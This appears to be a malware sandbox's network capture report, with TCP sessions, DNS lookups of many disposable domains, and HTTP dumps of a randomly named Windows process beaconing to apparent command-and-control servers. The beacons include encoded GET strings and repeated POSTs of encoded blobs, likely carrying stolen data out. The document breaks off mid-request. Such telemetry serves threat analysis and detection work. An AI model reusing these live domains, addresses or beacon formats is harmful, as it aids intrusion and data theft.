Dec 12, 2024 00:21:00.756251097 CET | 50012 | 80 | 192.168.2.5 | 38.6.78.235
Dec 12, 2024 00:21:00.875891924 CET | 80 | 50012 | 38.6.78.235 | 192.168.2.5
Dec 12, 2024 00:21:00.876108885 CET | 50012 | 80 | 192.168.2.5 | 38.6.78.235
Dec 12, 2024 00:21:00.888006926 CET | 50012 | 80 | 192.168.2.5 | 38.6.78.235
Dec 12, 2024 00:21:01.007742882 CET | 80 | 50012 | 38.6.78.235 | 192.168.2.5
Dec 12, 2024 00:21:02.185863018 CET | 80 | 50012 | 38.6.78.235 | 192.168.2.5
Dec 12, 2024 00:21:02.185911894 CET | 80 | 50012 | 38.6.78.235 | 192.168.2.5
Dec 12, 2024 00:21:02.186162949 CET | 50012 | 80 | 192.168.2.5 | 38.6.78.235
Dec 12, 2024 00:21:02.188659906 CET | 50012 | 80 | 192.168.2.5 | 38.6.78.235
Dec 12, 2024 00:21:02.310280085 CET | 80 | 50012 | 38.6.78.235 | 192.168.2.5
Dec 12, 2024 00:21:07.675323963 CET | 50013 | 80 | 192.168.2.5 | 3.125.36.175
Dec 12, 2024 00:21:07.796185017 CET | 80 | 50013 | 3.125.36.175 | 192.168.2.5
Dec 12, 2024 00:21:07.797244072 CET | 50013 | 80 | 192.168.2.5 | 3.125.36.175
Dec 12, 2024 00:21:07.809226036 CET | 50013 | 80 | 192.168.2.5 | 3.125.36.175
Dec 12, 2024 00:21:07.930413961 CET | 80 | 50013 | 3.125.36.175 | 192.168.2.5
Dec 12, 2024 00:21:09.175654888 CET | 80 | 50013 | 3.125.36.175 | 192.168.2.5
Dec 12, 2024 00:21:09.175688028 CET | 80 | 50013 | 3.125.36.175 | 192.168.2.5
Dec 12, 2024 00:21:09.175707102 CET | 80 | 50013 | 3.125.36.175 | 192.168.2.5
Dec 12, 2024 00:21:09.175800085 CET | 80 | 50013 | 3.125.36.175 | 192.168.2.5
Dec 12, 2024 00:21:09.175863028 CET | 50013 | 80 | 192.168.2.5 | 3.125.36.175
Dec 12, 2024 00:21:09.179368973 CET | 50013 | 80 | 192.168.2.5 | 3.125.36.175
Dec 12, 2024 00:21:09.316818953 CET | 50013 | 80 | 192.168.2.5 | 3.125.36.175
Dec 12, 2024 00:21:10.334728003 CET | 50014 | 80 | 192.168.2.5 | 3.125.36.175
Dec 12, 2024 00:21:10.456523895 CET | 80 | 50014 | 3.125.36.175 | 192.168.2.5
Dec 12, 2024 00:21:10.456617117 CET | 50014 | 80 | 192.168.2.5 | 3.125.36.175
Dec 12, 2024 00:21:10.474838972 CET | 50014 | 80 | 192.168.2.5 | 3.125.36.175
Dec 12, 2024 00:21:10.596410036 CET | 80 | 50014 | 3.125.36.175 | 192.168.2.5
Dec 12, 2024 00:21:11.851180077 CET | 80 | 50014 | 3.125.36.175 | 192.168.2.5
Dec 12, 2024 00:21:11.851201057 CET | 80 | 50014 | 3.125.36.175 | 192.168.2.5
Dec 12, 2024 00:21:11.851213932 CET | 80 | 50014 | 3.125.36.175 | 192.168.2.5
Dec 12, 2024 00:21:11.851361990 CET | 80 | 50014 | 3.125.36.175 | 192.168.2.5
Dec 12, 2024 00:21:11.851422071 CET | 50014 | 80 | 192.168.2.5 | 3.125.36.175
Dec 12, 2024 00:21:11.851823092 CET | 50014 | 80 | 192.168.2.5 | 3.125.36.175
Dec 12, 2024 00:21:11.988296986 CET | 50014 | 80 | 192.168.2.5 | 3.125.36.175
Dec 12, 2024 00:21:13.007074118 CET | 50015 | 80 | 192.168.2.5 | 3.125.36.175
Dec 12, 2024 00:21:13.126652002 CET | 80 | 50015 | 3.125.36.175 | 192.168.2.5
Dec 12, 2024 00:21:13.126856089 CET | 50015 | 80 | 192.168.2.5 | 3.125.36.175
Dec 12, 2024 00:21:13.138943911 CET | 50015 | 80 | 192.168.2.5 | 3.125.36.175
Dec 12, 2024 00:21:13.258429050 CET | 80 | 50015 | 3.125.36.175 | 192.168.2.5
Dec 12, 2024 00:21:13.258483887 CET | 80 | 50015 | 3.125.36.175 | 192.168.2.5
Dec 12, 2024 00:21:14.495083094 CET | 80 | 50015 | 3.125.36.175 | 192.168.2.5
Dec 12, 2024 00:21:14.495151043 CET | 50015 | 80 | 192.168.2.5 | 3.125.36.175
Dec 12, 2024 00:21:14.643383980 CET | 50015 | 80 | 192.168.2.5 | 3.125.36.175
Dec 12, 2024 00:21:14.762726068 CET | 80 | 50015 | 3.125.36.175 | 192.168.2.5
Dec 12, 2024 00:21:15.662360907 CET | 50016 | 80 | 192.168.2.5 | 3.125.36.175
Dec 12, 2024 00:21:15.781971931 CET | 80 | 50016 | 3.125.36.175 | 192.168.2.5
Dec 12, 2024 00:21:15.782074928 CET | 50016 | 80 | 192.168.2.5 | 3.125.36.175
Dec 12, 2024 00:21:15.791404009 CET | 50016 | 80 | 192.168.2.5 | 3.125.36.175
Dec 12, 2024 00:21:15.912586927 CET | 80 | 50016 | 3.125.36.175 | 192.168.2.5
Dec 12, 2024 00:21:17.158143044 CET | 80 | 50016 | 3.125.36.175 | 192.168.2.5
Dec 12, 2024 00:21:17.158221006 CET | 80 | 50016 | 3.125.36.175 | 192.168.2.5
Dec 12, 2024 00:21:17.158231020 CET | 80 | 50016 | 3.125.36.175 | 192.168.2.5
Dec 12, 2024 00:21:17.158384085 CET | 80 | 50016 | 3.125.36.175 | 192.168.2.5
Dec 12, 2024 00:21:17.158405066 CET | 50016 | 80 | 192.168.2.5 | 3.125.36.175
Dec 12, 2024 00:21:17.158562899 CET | 50016 | 80 | 192.168.2.5 | 3.125.36.175
Dec 12, 2024 00:21:17.162758112 CET | 50016 | 80 | 192.168.2.5 | 3.125.36.175
Dec 12, 2024 00:21:17.283638000 CET | 80 | 50016 | 3.125.36.175 | 192.168.2.5
Dec 12, 2024 00:21:22.506592989 CET | 50017 | 80 | 192.168.2.5 | 172.67.176.240
Dec 12, 2024 00:21:22.625998974 CET | 80 | 50017 | 172.67.176.240 | 192.168.2.5
Dec 12, 2024 00:21:22.626084089 CET | 50017 | 80 | 192.168.2.5 | 172.67.176.240
Dec 12, 2024 00:21:22.641112089 CET | 50017 | 80 | 192.168.2.5 | 172.67.176.240
Dec 12, 2024 00:21:22.760489941 CET | 80 | 50017 | 172.67.176.240 | 192.168.2.5
Dec 12, 2024 00:21:24.143527031 CET | 50017 | 80 | 192.168.2.5 | 172.67.176.240
Dec 12, 2024 00:21:24.263488054 CET | 80 | 50017 | 172.67.176.240 | 192.168.2.5
Dec 12, 2024 00:21:24.263566971 CET | 50017 | 80 | 192.168.2.5 | 172.67.176.240
Dec 12, 2024 00:21:25.163871050 CET | 50018 | 80 | 192.168.2.5 | 172.67.176.240
Dec 12, 2024 00:21:25.283320904 CET | 80 | 50018 | 172.67.176.240 | 192.168.2.5
Dec 12, 2024 00:21:25.285845995 CET | 50018 | 80 | 192.168.2.5 | 172.67.176.240
Dec 12, 2024 00:21:25.298693895 CET | 50018 | 80 | 192.168.2.5 | 172.67.176.240
Dec 12, 2024 00:21:25.418106079 CET | 80 | 50018 | 172.67.176.240 | 192.168.2.5
Dec 12, 2024 00:21:26.799915075 CET | 50018 | 80 | 192.168.2.5 | 172.67.176.240
Dec 12, 2024 00:21:26.919802904 CET | 80 | 50018 | 172.67.176.240 | 192.168.2.5
Dec 12, 2024 00:21:26.919979095 CET | 50018 | 80 | 192.168.2.5 | 172.67.176.240
Dec 12, 2024 00:21:27.817800045 CET | 50019 | 80 | 192.168.2.5 | 172.67.176.240
Dec 12, 2024 00:21:27.940200090 CET | 80 | 50019 | 172.67.176.240 | 192.168.2.5
Dec 12, 2024 00:21:27.945100069 CET | 50019 | 80 | 192.168.2.5 | 172.67.176.240
Dec 12, 2024 00:21:27.953502893 CET | 50019 | 80 | 192.168.2.5 | 172.67.176.240
Dec 12, 2024 00:21:28.075232029 CET | 80 | 50019 | 172.67.176.240 | 192.168.2.5
Dec 12, 2024 00:21:28.076981068 CET | 80 | 50019 | 172.67.176.240 | 192.168.2.5
Dec 12, 2024 00:21:29.458673000 CET | 50019 | 80 | 192.168.2.5 | 172.67.176.240
Dec 12, 2024 00:21:29.578603029 CET | 80 | 50019 | 172.67.176.240 | 192.168.2.5
Dec 12, 2024 00:21:29.584827900 CET | 50019 | 80 | 192.168.2.5 | 172.67.176.240
Dec 12, 2024 00:21:30.475109100 CET | 50020 | 80 | 192.168.2.5 | 172.67.176.240
Dec 12, 2024 00:21:30.595726967 CET | 80 | 50020 | 172.67.176.240 | 192.168.2.5
Dec 12, 2024 00:21:30.595881939 CET | 50020 | 80 | 192.168.2.5 | 172.67.176.240
Dec 12, 2024 00:21:30.642664909 CET | 50020 | 80 | 192.168.2.5 | 172.67.176.240
Dec 12, 2024 00:21:30.763724089 CET | 80 | 50020 | 172.67.176.240 | 192.168.2.5
Dec 12, 2024 00:22:10.729553938 CET | 80 | 50020 | 172.67.176.240 | 192.168.2.5
Dec 12, 2024 00:22:10.729927063 CET | 80 | 50020 | 172.67.176.240 | 192.168.2.5
Dec 12, 2024 00:22:10.730052948 CET | 50020 | 80 | 192.168.2.5 | 172.67.176.240
Dec 12, 2024 00:22:10.732274055 CET | 50020 | 80 | 192.168.2.5 | 172.67.176.240
Dec 12, 2024 00:22:10.853157997 CET | 80 | 50020 | 172.67.176.240 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 12, 2024 00:18:30.029191971 CET | 50388 | 53 | 192.168.2.5 | 1.1.1.1
Dec 12, 2024 00:18:30.506660938 CET | 53 | 50388 | 1.1.1.1 | 192.168.2.5
Dec 12, 2024 00:18:46.802054882 CET | 56551 | 53 | 192.168.2.5 | 1.1.1.1
Dec 12, 2024 00:18:47.311109066 CET | 53 | 56551 | 1.1.1.1 | 192.168.2.5
Dec 12, 2024 00:19:01.695694923 CET | 57366 | 53 | 192.168.2.5 | 1.1.1.1
Dec 12, 2024 00:19:02.454905987 CET | 53 | 57366 | 1.1.1.1 | 192.168.2.5
Dec 12, 2024 00:19:16.758668900 CET | 64201 | 53 | 192.168.2.5 | 1.1.1.1
Dec 12, 2024 00:19:17.672605991 CET | 53 | 64201 | 1.1.1.1 | 192.168.2.5
Dec 12, 2024 00:19:32.366599083 CET | 62445 | 53 | 192.168.2.5 | 1.1.1.1
Dec 12, 2024 00:19:33.134543896 CET | 53 | 62445 | 1.1.1.1 | 192.168.2.5
Dec 12, 2024 00:19:47.803029060 CET | 65025 | 53 | 192.168.2.5 | 1.1.1.1
Dec 12, 2024 00:19:48.759537935 CET | 53 | 65025 | 1.1.1.1 | 192.168.2.5
Dec 12, 2024 00:20:03.084351063 CET | 50171 | 53 | 192.168.2.5 | 1.1.1.1
Dec 12, 2024 00:20:03.625883102 CET | 53 | 50171 | 1.1.1.1 | 192.168.2.5
Dec 12, 2024 00:20:18.006520033 CET | 58167 | 53 | 192.168.2.5 | 1.1.1.1
Dec 12, 2024 00:20:19.005263090 CET | 58167 | 53 | 192.168.2.5 | 1.1.1.1
Dec 12, 2024 00:20:19.359355927 CET | 53 | 58167 | 1.1.1.1 | 192.168.2.5
Dec 12, 2024 00:20:19.359369040 CET | 53 | 58167 | 1.1.1.1 | 192.168.2.5
Dec 12, 2024 00:20:34.053006887 CET | 54168 | 53 | 192.168.2.5 | 1.1.1.1
Dec 12, 2024 00:20:34.920676947 CET | 53 | 54168 | 1.1.1.1 | 192.168.2.5
Dec 12, 2024 00:20:49.586735010 CET | 56041 | 53 | 192.168.2.5 | 1.1.1.1
Dec 12, 2024 00:20:50.596684933 CET | 56041 | 53 | 192.168.2.5 | 1.1.1.1
Dec 12, 2024 00:20:51.597526073 CET | 56041 | 53 | 192.168.2.5 | 1.1.1.1
Dec 12, 2024 00:20:52.748687029 CET | 53 | 56041 | 1.1.1.1 | 192.168.2.5
Dec 12, 2024 00:20:52.748728991 CET | 53 | 56041 | 1.1.1.1 | 192.168.2.5
Dec 12, 2024 00:20:52.748756886 CET | 53 | 56041 | 1.1.1.1 | 192.168.2.5
Dec 12, 2024 00:21:07.194655895 CET | 57260 | 53 | 192.168.2.5 | 1.1.1.1
Dec 12, 2024 00:21:07.671880007 CET | 53 | 57260 | 1.1.1.1 | 192.168.2.5
Dec 12, 2024 00:21:22.178101063 CET | 54853 | 53 | 192.168.2.5 | 1.1.1.1
Dec 12, 2024 00:21:22.504045963 CET | 53 | 54853 | 1.1.1.1 | 192.168.2.5
Dec 12, 2024 00:22:15.754379034 CET | 56774 | 53 | 192.168.2.5 | 1.1.1.1
Dec 12, 2024 00:22:16.752842903 CET | 56774 | 53 | 192.168.2.5 | 1.1.1.1
Dec 12, 2024 00:22:16.824521065 CET | 53 | 56774 | 1.1.1.1 | 192.168.2.5
Dec 12, 2024 00:22:16.892524958 CET | 53 | 56774 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 12, 2024 00:18:30.029191971 CET | 192.168.2.5 | 1.1.1.1 | 0x44ba | Standard query (0) | www.emirates-visa.net | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:18:46.802054882 CET | 192.168.2.5 | 1.1.1.1 | 0x5856 | Standard query (0) | www.070001813.xyz | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:19:01.695694923 CET | 192.168.2.5 | 1.1.1.1 | 0x7b00 | Standard query (0) | www.activateya.life | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:19:16.758668900 CET | 192.168.2.5 | 1.1.1.1 | 0xaadc | Standard query (0) | www.walkecode.top | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:19:32.366599083 CET | 192.168.2.5 | 1.1.1.1 | 0x6f6f | Standard query (0) | www.ciemanr.quest | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:19:47.803029060 CET | 192.168.2.5 | 1.1.1.1 | 0x6b8b | Standard query (0) | www.growbamboo.xyz | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:20:03.084351063 CET | 192.168.2.5 | 1.1.1.1 | 0xe0e | Standard query (0) | www.primespot.live | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:20:18.006520033 CET | 192.168.2.5 | 1.1.1.1 | 0x3acc | Standard query (0) | www.hisako.shop | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:20:19.005263090 CET | 192.168.2.5 | 1.1.1.1 | 0x3acc | Standard query (0) | www.hisako.shop | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:20:34.053006887 CET | 192.168.2.5 | 1.1.1.1 | 0x1858 | Standard query (0) | www.rwse6wjx.sbs | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:20:49.586735010 CET | 192.168.2.5 | 1.1.1.1 | 0x6acd | Standard query (0) | www.17jkgl.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:20:50.596684933 CET | 192.168.2.5 | 1.1.1.1 | 0x6acd | Standard query (0) | www.17jkgl.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:20:51.597526073 CET | 192.168.2.5 | 1.1.1.1 | 0x6acd | Standard query (0) | www.17jkgl.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:21:07.194655895 CET | 192.168.2.5 | 1.1.1.1 | 0x4b62 | Standard query (0) | www.thezensive.work | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:21:22.178101063 CET | 192.168.2.5 | 1.1.1.1 | 0x6416 | Standard query (0) | www.zrichiod-riech.sbs | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:22:15.754379034 CET | 192.168.2.5 | 1.1.1.1 | 0x4965 | Standard query (0) | www.wtsshnm.top | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:22:16.752842903 CET | 192.168.2.5 | 1.1.1.1 | 0x4965 | Standard query (0) | www.wtsshnm.top | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 12, 2024 00:18:30.506660938 CET | 1.1.1.1 | 192.168.2.5 | 0x44ba | No error (0) | www.emirates-visa.net | emirates-visa.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 12, 2024 00:18:30.506660938 CET | 1.1.1.1 | 192.168.2.5 | 0x44ba | No error (0) | emirates-visa.net |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:18:30.506660938 CET | 1.1.1.1 | 192.168.2.5 | 0x44ba | No error (0) | emirates-visa.net |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:18:47.311109066 CET | 1.1.1.1 | 192.168.2.5 | 0x5856 | No error (0) | www.070001813.xyz |  | 161.97.142.144 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:19:02.454905987 CET | 1.1.1.1 | 192.168.2.5 | 0x7b00 | No error (0) | www.activateya.life | activateya.life |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 12, 2024 00:19:02.454905987 CET | 1.1.1.1 | 192.168.2.5 | 0x7b00 | No error (0) | activateya.life |  | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:19:17.672605991 CET | 1.1.1.1 | 192.168.2.5 | 0xaadc | No error (0) | www.walkecode.top |  | 124.71.162.21 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:19:33.134543896 CET | 1.1.1.1 | 192.168.2.5 | 0x6f6f | No error (0) | www.ciemanr.quest | 2.ciemanr.quest |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 12, 2024 00:19:33.134543896 CET | 1.1.1.1 | 192.168.2.5 | 0x6f6f | No error (0) | 2.ciemanr.quest | a2-1.ciemanr.quest |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 12, 2024 00:19:33.134543896 CET | 1.1.1.1 | 192.168.2.5 | 0x6f6f | No error (0) | a2-1.ciemanr.quest | a2rukou.jingdong.skin |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 12, 2024 00:19:33.134543896 CET | 1.1.1.1 | 192.168.2.5 | 0x6f6f | No error (0) | a2rukou.jingdong.skin | rk.jingdong.skin |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 12, 2024 00:19:33.134543896 CET | 1.1.1.1 | 192.168.2.5 | 0x6f6f | No error (0) | rk.jingdong.skin |  | 150.109.11.247 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:19:48.759537935 CET | 1.1.1.1 | 192.168.2.5 | 0x6b8b | No error (0) | www.growbamboo.xyz | banajibazar.xyz |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 12, 2024 00:19:48.759537935 CET | 1.1.1.1 | 192.168.2.5 | 0x6b8b | No error (0) | banajibazar.xyz |  | 173.208.249.155 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:20:03.625883102 CET | 1.1.1.1 | 192.168.2.5 | 0xe0e | No error (0) | www.primespot.live |  | 209.74.79.42 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:20:19.359355927 CET | 1.1.1.1 | 192.168.2.5 | 0x3acc | No error (0) | www.hisako.shop | dns.ladipage.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 12, 2024 00:20:19.359355927 CET | 1.1.1.1 | 192.168.2.5 | 0x3acc | No error (0) | dns.ladipage.com |  | 18.139.62.226 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:20:19.359355927 CET | 1.1.1.1 | 192.168.2.5 | 0x3acc | No error (0) | dns.ladipage.com |  | 13.228.81.39 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:20:19.359355927 CET | 1.1.1.1 | 192.168.2.5 | 0x3acc | No error (0) | dns.ladipage.com |  | 54.179.173.60 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:20:19.359369040 CET | 1.1.1.1 | 192.168.2.5 | 0x3acc | No error (0) | www.hisako.shop | dns.ladipage.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 12, 2024 00:20:19.359369040 CET | 1.1.1.1 | 192.168.2.5 | 0x3acc | No error (0) | dns.ladipage.com |  | 18.139.62.226 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:20:19.359369040 CET | 1.1.1.1 | 192.168.2.5 | 0x3acc | No error (0) | dns.ladipage.com |  | 13.228.81.39 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:20:19.359369040 CET | 1.1.1.1 | 192.168.2.5 | 0x3acc | No error (0) | dns.ladipage.com |  | 54.179.173.60 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:20:34.920676947 CET | 1.1.1.1 | 192.168.2.5 | 0x1858 | No error (0) | www.rwse6wjx.sbs | b1-3-r11-gmhudx.t9d2quy5.shop |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 12, 2024 00:20:34.920676947 CET | 1.1.1.1 | 192.168.2.5 | 0x1858 | No error (0) | b1-3-r11-gmhudx.t9d2quy5.shop | b1-3-r11.t9d2quy5.shop |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 12, 2024 00:20:34.920676947 CET | 1.1.1.1 | 192.168.2.5 | 0x1858 | No error (0) | b1-3-r11.t9d2quy5.shop | b1-3-r111-s65psj.8uqm5xgy.shop |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 12, 2024 00:20:34.920676947 CET | 1.1.1.1 | 192.168.2.5 | 0x1858 | No error (0) | b1-3-r111-s65psj.8uqm5xgy.shop | b1-3-r11-nff52.alicloudddos.top |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 12, 2024 00:20:34.920676947 CET | 1.1.1.1 | 192.168.2.5 | 0x1858 | No error (0) | b1-3-r11-nff52.alicloudddos.top | b1-3-r111-s65psj.alicloudddos.top |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 12, 2024 00:20:34.920676947 CET | 1.1.1.1 | 192.168.2.5 | 0x1858 | No error (0) | b1-3-r111-s65psj.alicloudddos.top | b1-3-r111-55g56.kunlundns.top |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 12, 2024 00:20:34.920676947 CET | 1.1.1.1 | 192.168.2.5 | 0x1858 | No error (0) | b1-3-r111-55g56.kunlundns.top | b1-3-r111.kunlundns.top |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 12, 2024 00:20:34.920676947 CET | 1.1.1.1 | 192.168.2.5 | 0x1858 | No error (0) | b1-3-r111.kunlundns.top |  | 101.32.205.61 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:20:52.748687029 CET | 1.1.1.1 | 192.168.2.5 | 0x6acd | No error (0) | www.17jkgl.com |  | 38.6.78.235 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:20:52.748728991 CET | 1.1.1.1 | 192.168.2.5 | 0x6acd | No error (0) | www.17jkgl.com |  | 38.6.78.235 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:20:52.748756886 CET | 1.1.1.1 | 192.168.2.5 | 0x6acd | No error (0) | www.17jkgl.com |  | 38.6.78.235 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:21:07.671880007 CET | 1.1.1.1 | 192.168.2.5 | 0x4b62 | No error (0) | www.thezensive.work | thezensive.netlify.app |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 12, 2024 00:21:07.671880007 CET | 1.1.1.1 | 192.168.2.5 | 0x4b62 | No error (0) | thezensive.netlify.app |  | 3.125.36.175 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:21:07.671880007 CET | 1.1.1.1 | 192.168.2.5 | 0x4b62 | No error (0) | thezensive.netlify.app |  | 3.75.10.80 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:21:22.504045963 CET | 1.1.1.1 | 192.168.2.5 | 0x6416 | No error (0) | www.zrichiod-riech.sbs |  | 172.67.176.240 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:21:22.504045963 CET | 1.1.1.1 | 192.168.2.5 | 0x6416 | No error (0) | www.zrichiod-riech.sbs |  | 104.21.56.41 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:22:16.824521065 CET | 1.1.1.1 | 192.168.2.5 | 0x4965 | No error (0) | www.wtsshnm.top |  | 45.41.80.144 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 00:22:16.892524958 CET | 1.1.1.1 | 192.168.2.5 | 0x4965 | No error (0) | www.wtsshnm.top |  | 45.41.80.144 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49740 | 3.33.130.190 | 80 | 5884 | C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 00:18:30.643790960 CET | 508 | OUT | GET /5cm4/?NdLhG=cLCtFnqPUvutTbuP&LDVlCz=ZOi5UH6lCHBhnBF9yu7lTl97V2po4KHEvqmaFY3uiUnnM3Kevyv9Tk9tf7brSgBHOaIF9h93DunAghZY9lTBZL9WpirrmBEOY4nZmUaXlywW6LOtEGR1afh1jX/LxafgQA== HTTP/1.1
Host: www.emirates-visa.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
Dec 12, 2024 00:18:31.733844995 CET | 398 | IN | HTTP/1.1 200 OK
content-type: text/html
date: Wed, 11 Dec 2024 23:18:31 GMT
content-length: 277
connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?NdLhG=cLCtFnqPUvutTbuP&LDVlCz=ZOi5UH6lCHBhnBF9yu7lTl97V2po4KHEvqmaFY3uiUnnM3Kevyv9Tk9tf7brSgBHOaIF9h93DunAghZY9lTBZL9WpirrmBEOY4nZmUaXlywW6LOtEGR1afh1jX/LxafgQA=="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49776 | 161.97.142.144 | 80 | 5884 | C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 00:18:47.449197054 CET | 755 | OUT | POST /gn0y/ HTTP/1.1
Host: www.070001813.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://www.070001813.xyz
Referer: http://www.070001813.xyz/gn0y/
Content-Length: 207
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
Data Ascii: LDVlCz=QcubSUa0vjzoM/rB2+j1wbXMa42M/jQn2amrbItCbNqg9OpSfYKqPFYF1C+wGmioM0oFU8fcozV90ZXlQHdnw/VbA6FlrBwFhADdf44VUCBBh1i35vp1E5GY5ItKNlFw0tj6Iu9wDUbojTrNn8bQkCX6YNspIeLaAEXgaTjdNUzuPPQTCOMhdxuwHDhRBTHW7N6e5Uc=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49782 | 161.97.142.144 | 80 | 5884 | C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 00:18:50.110093117 CET | 775 | OUT | POST /gn0y/ HTTP/1.1
Host: www.070001813.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://www.070001813.xyz
Referer: http://www.070001813.xyz/gn0y/
Content-Length: 227
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
Data Ascii: LDVlCz=QcubSUa0vjzoNf7BwZ/1h7XPDY2MxDQd2a6rbJ5ob76g9vZSedqqBlYF/i+xZ2izM01yU+LcozR90dTlQwJo/PVVG6FnlhwFhADdf49wUCZBmFS34Op2OZGb+ItKGFFs0tjYIq9eDXjojRzNmpnRxSWxG9s8Jrm2ACXcAwO9Z1vHHZh5YsEJORCIXQpmQjm/huqunDKYOGKHDjjToBTRfkNyH0OD


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49789 | 161.97.142.144 | 80 | 5884 | C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 00:18:52.778666973 CET | 1792 | OUT | POST /gn0y/ HTTP/1.1
Host: www.070001813.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://www.070001813.xyz
Referer: http://www.070001813.xyz/gn0y/
Content-Length: 1243
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
